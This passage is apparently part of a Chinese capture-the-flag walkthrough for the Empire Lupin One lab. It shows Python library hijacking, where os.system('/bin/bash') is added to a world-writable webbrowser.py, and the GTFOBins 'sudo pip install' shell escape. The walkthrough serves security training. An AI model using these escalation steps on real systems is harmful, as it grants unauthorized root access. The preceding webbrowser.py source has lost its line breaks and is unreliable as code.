url],close_fds=True, stdin=devnull,stdout=devnull, stderr=devnull,start_new_session=True)except OSError:return Falseelse:return (p.poll() is None)class Grail(BaseBrowser):# There should be a way to maintain a connection to Grail, but the# Grail remote control protocol doesn't really allow that at this# point.  It probably never will!def _find_grail_rc(self):import globimport pwdimport socketimport tempfiletempdir = os.path.join(tempfile.gettempdir(),".grail-unix")user = pwd.getpwuid(os.getuid())[0]filename = os.path.join(glob.escape(tempdir), glob.escape(user) + "-*")maybes = glob.glob(filename)if not maybes:return Nones = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)for fn in maybes:# need to PING each one until we find one that's livetry:s.connect(fn)except OSError:# no good; attempt to clean it out, but don't fail:try:os.unlink(fn)except OSError:passelse:return sdef _remote(self, action):s = self._find_grail_rc()if not s:return 0s.send(action)s.close()return 1def open(self, url, new=0, autoraise=True):sys.audit("webbrowser.open", url)if new:ok = self._remote("LOADNEW " + url)else:ok = self._remote("LOAD " + url)return ok#
# Platform support for Unix
## These are the right tests because all these Unix browsers require either
# a console terminal or an X display to run.def register_X_browsers():# use xdg-open if aroundif shutil.which("xdg-open"):register("xdg-open", None, BackgroundBrowser("xdg-open"))# The default GNOME3 browserif "GNOME_DESKTOP_SESSION_ID" in os.environ and shutil.which("gvfs-open"):register("gvfs-open", None, BackgroundBrowser("gvfs-open"))# The default GNOME browserif "GNOME_DESKTOP_SESSION_ID" in os.environ and shutil.which("gnome-open"):register("gnome-open", None, BackgroundBrowser("gnome-open"))# The default KDE browserif "KDE_FULL_SESSION" in os.environ and shutil.which("kfmclient"):register("kfmclient", Konqueror, Konqueror("kfmclient"))if shutil.which("x-www-browser"):register("x-www-browser", None, BackgroundBrowser("x-www-browser"))# The Mozilla browsersfor browser in ("firefox", "iceweasel", "iceape", "seamonkey"):if shutil.which(browser):register(browser, None, Mozilla(browser))# The Netscape and old Mozilla browsersfor browser in ("mozilla-firefox","mozilla-firebird", "firebird","mozilla", "netscape"):if shutil.which(browser):register(browser, None, Netscape(browser))# Konqueror/kfm, the KDE browser.if shutil.which("kfm"):register("kfm", Konqueror, Konqueror("kfm"))elif shutil.which("konqueror"):register("konqueror", Konqueror, Konqueror("konqueror"))# Gnome's Galeon and Epiphanyfor browser in ("galeon", "epiphany"):if shutil.which(browser):register(browser, None, Galeon(browser))# Skipstone, another Gtk/Mozilla based browserif shutil.which("skipstone"):register("skipstone", None, BackgroundBrowser("skipstone"))# Google Chrome/Chromium browsersfor browser in ("google-chrome", "chrome", "chromium", "chromium-browser"):if shutil.which(browser):register(browser, None, Chrome(browser))# Opera, quite popularif shutil.which("opera"):register("opera", None, Opera("opera"))# Next, Mosaic -- old but still in use.if shutil.which("mosaic"):register("mosaic", None, BackgroundBrowser("mosaic"))# Grail, the Python browser. Does anybody still use it?if shutil.which("grail"):register("grail", Grail, None)def register_standard_browsers():global _tryorder_tryorder = []if sys.platform == 'darwin':register("MacOSX", None, MacOSXOSAScript('default'))register("chrome", None, MacOSXOSAScript('chrome'))register("firefox", None, MacOSXOSAScript('firefox'))register("safari", None, MacOSXOSAScript('safari'))# OS X can use below Unix support (but we prefer using the OS X# specific stuff)if sys.platform[:3] == "win":# First try to use the default Windows browserregister("windows-default", WindowsDefault)# Detect some common Windows browsers, fallback to IEiexplore = os.path.join(os.environ.get("PROGRAMFILES", "C:\\Program Files"),"Internet Explorer\\IEXPLORE.EXE")for browser in ("firefox", "firebird", "seamonkey", "mozilla","netscape", "opera", iexplore):if shutil.which(browser):register(browser, None, BackgroundBrowser(browser))else:# Prefer X browsers if presentif os.environ.get("DISPLAY") or os.environ.get("WAYLAND_DISPLAY"):try:cmd = "xdg-settings get default-web-browser".split()raw_result = subprocess.check_output(cmd, stderr=subprocess.DEVNULL)result = raw_result.decode().strip()except (FileNotFoundError, subprocess.CalledProcessError, PermissionError, NotADirectoryError) :passelse:global _os_preferred_browser_os_preferred_browser = resultregister_X_browsers()# Also try console browsersif os.environ.get("TERM"):if shutil.which("www-browser"):register("www-browser", None, GenericBrowser("www-browser"))# The Links/elinks browsers <http://artax.karlin.mff.cuni.cz/~mikulas/links/>if shutil.which("links"):register("links", None, GenericBrowser("links"))if shutil.which("elinks"):register("elinks", None, Elinks("elinks"))# The Lynx browser <http://lynx.isc.org/>, <http://lynx.browser.org/>if shutil.which("lynx"):register("lynx", None, GenericBrowser("lynx"))# The w3m browser <http://w3m.sourceforge.net/>if shutil.which("w3m"):register("w3m", None, GenericBrowser("w3m"))# OK, now that we know what the default preference orders for each# platform are, allow user to override them with the BROWSER variable.if "BROWSER" in os.environ:userchoices = os.environ["BROWSER"].split(os.pathsep)userchoices.reverse()# Treat choices in same way as if passed into get() but do register# and prepend to _tryorderfor cmdline in userchoices:if cmdline != '':cmd = _synthesize(cmdline, preferred=True)if cmd[1] is None:register(cmdline, None, GenericBrowser(cmdline), preferred=True)# what to do if _tryorder is now empty?#
# Platform support for Windows
#if sys.platform[:3] == "win":class WindowsDefault(BaseBrowser):def open(self, url, new=0, autoraise=True):sys.audit("webbrowser.open", url)try:os.startfile(url)except OSError:# [Error 22] No application is associated with the specified# file for this operation: '<URL>'return Falseelse:return True#
# Platform support for MacOS
#if sys.platform == 'darwin':# Adapted from patch submitted to SourceForge by Steven J. Burrclass MacOSX(BaseBrowser):"""Launcher class for Aqua browsers on Mac OS XOptionally specify a browser name on instantiation.  Note that thiswill not work for Aqua browsers if the user has moved the applicationpackage after installation.If no browser is specified, the default browser, as specified in theInternet System Preferences panel, will be used."""def __init__(self, name):self.name = namedef open(self, url, new=0, autoraise=True):sys.audit("webbrowser.open", url)assert "'" not in url# hack for local urlsif not ':' in url:url = 'file:'+url# new must be 0 or 1new = int(bool(new))if self.name == "default":# User called open, open_new or get without a browser parameterscript = 'open location "%s"' % url.replace('"', '%22') # opens in default browserelse:# User called get and chose a browserif self.name == "OmniWeb":toWindow = ""else:# Include toWindow parameter of OpenURL command for browsers# that support it.  0 == new window; -1 == existingtoWindow = "toWindow %d" % (new - 1)cmd = 'OpenURL "%s"' % url.replace('"', '%22')script = '''tell application "%s"activate%s %send tell''' % (self.name, cmd, toWindow)# Open pipe to AppleScript through osascript commandosapipe = os.popen("osascript", "w")if osapipe is None:return False# Write script to osascript's stdinosapipe.write(script)rc = osapipe.close()return not rcclass MacOSXOSAScript(BaseBrowser):def __init__(self, name):self._name = namedef open(self, url, new=0, autoraise=True):if self._name == 'default':script = 'open location "%s"' % url.replace('"', '%22') # opens in default browserelse:script = '''tell application "%s"activateopen location "%s"end'''%(self._name, url.replace('"', '%22'))osapipe = os.popen("osascript", "w")if osapipe is None:return Falseosapipe.write(script)rc = osapipe.close()return not rcdef main():import getoptusage = """Usage: %s [-n | -t] url-n: open new window-t: open new tab""" % sys.argv[0]try:opts, args = getopt.getopt(sys.argv[1:], 'ntd')except getopt.error as msg:print(msg, file=sys.stderr)print(usage, file=sys.stderr)sys.exit(1)new_win = 0for o, a in opts:if o == '-n': new_win = 1elif o == '-t': new_win = 2if len(args) != 1:print(usage, file=sys.stderr)sys.exit(1)url = args[0]open(url, new_win)print("\a")if __name__ == "__main__":main()

可以看到模块有导入os模块
对比两个文件权限,可以发现webbrowser.py任何用户具备可读可写可执行权限

修改 webbrower.py,添加以下代码

os.system ("/bin/bash")

使用 vi 打开文件:vim /usr/lib/python3.9/webbrowser.py

写入代码,保存文件:wq

执行以下命令切换 shell: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mbC0scPD-1650254335676)(https://s2.loli.net/2022/01/06/ko3zDrfWAi9dJb7.png)]

成功切换

2.4.3 使用 sudo 程序提权

访问:https://gtfobins.github.io/,查询 pip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OBUDN2iD-1650254335677)(https://s2.loli.net/2022/01/06/pS6jwIt7o1RPi4H.png)]

点击访问:https://gtfobins.github.io/gtfobins/pip/#sudo

复制上面代码在 shell 中执行

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

成功提权

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-U6k0lhsX-1650254335677)(https://s2.loli.net/2022/01/06/WYnIaKszr84HOgu.png)]

总结

本次靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权

  1. ffuf 工具暴力破解目录
  2. 在线识别算法https://www.dcode.fr/cipher-identifier
  3. ssh2john工具的使用
  4. 使用 john 破解 hash
  5. sudo:pip提权

靶机渗透练习41-Empire Lupin One相关推荐

  1. 靶机11 Empire Lupin One

    总结 本次靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权 ffuf 工具暴力破解目录 在线识别算法:https://www.dcode.fr/cipher-identifier ssh2john工 ...

  2. HackInOS靶机渗透writeup

    HackInOS靶机渗透writeup 0x00准备测试环境 导入下载好的HackInOS.ova文件后,将网络设置成桥接模式,并使用DHCP分配IP. 成功后打开的靶机图如下 0x01渗透过程 使用 ...

  3. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  4. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  5. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

  6. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  7. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  8. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  9. Bulldog靶机渗透

    Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...

  10. 【VulnHub靶机渗透】一:BullDog2

    在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...

最新文章

  1. 【机器学习算法-python实现】svm支持向量机(1)—理论知识介绍
  2. Linux set命令参数及与env, export的区别
  3. matlab中存档算法代码,MATLAB 智能算法超级学习手册中程序代码
  4. 逆向调试雷电思路总结
  5. python安装wheel失败_Python安装Pyinstaller失败,Preparing wheel metadata ... error
  6. iText操作PDF基础
  7. 解决wps在windows上弹窗等的流氓行为
  8. qq自动发消息python脚本_python实现定时发送qq消息
  9. 使用激活工具后主页被篡改为hao123
  10. Cox回归和HR值理解要点难点,实例讲解
  11. 通过字节码分析this关键字以及异常表的重要作用
  12. hp 800 g4 twr linux,【拆机】HP EliteDesk 800 G4 TWR—探究塔式机箱的秘密
  13. 服务器和网页接口,WebApi架构详解,WebApi接口搭建与部署WebApi服务器
  14. 明日方舟抽卡模拟器wiki_明日方舟抽卡模拟器
  15. 同时删除多个 PDF 文档最后几页
  16. Python基本编程题
  17. 为什么有些人钱花了而赚不到钱呢?
  18. python3爬取淘女郎图片
  19. JavaScript实现模态对话框
  20. 华北科技学院计算机专业录取分数线,2018华北科技学院在各省录取分数线【最新公布】...

热门文章

  1. 四、WebDriver(Selenium 2.0)
  2. 香港科大商学院2021年博士招生宣讲会
  3. 高频DCDC电源减小EMI的布局技巧
  4. 飞思卡尔mc9s08烧录方法_飞思卡尔8位单片机MC9S08JM60开发板实践教程
  5. 基于无人机的移动边缘计算网络(Matlab代码实现)
  6. pytorch 寻找二元函数的最小值
  7. 当h5页面横向不能滚动,如何优雅的显示表格数据
  8. 洛谷——P1017 [NOIP2000 提高组] 进制转换(C++)
  9. (function a(){})()是什么意思
  10. AS导入安卓源码步骤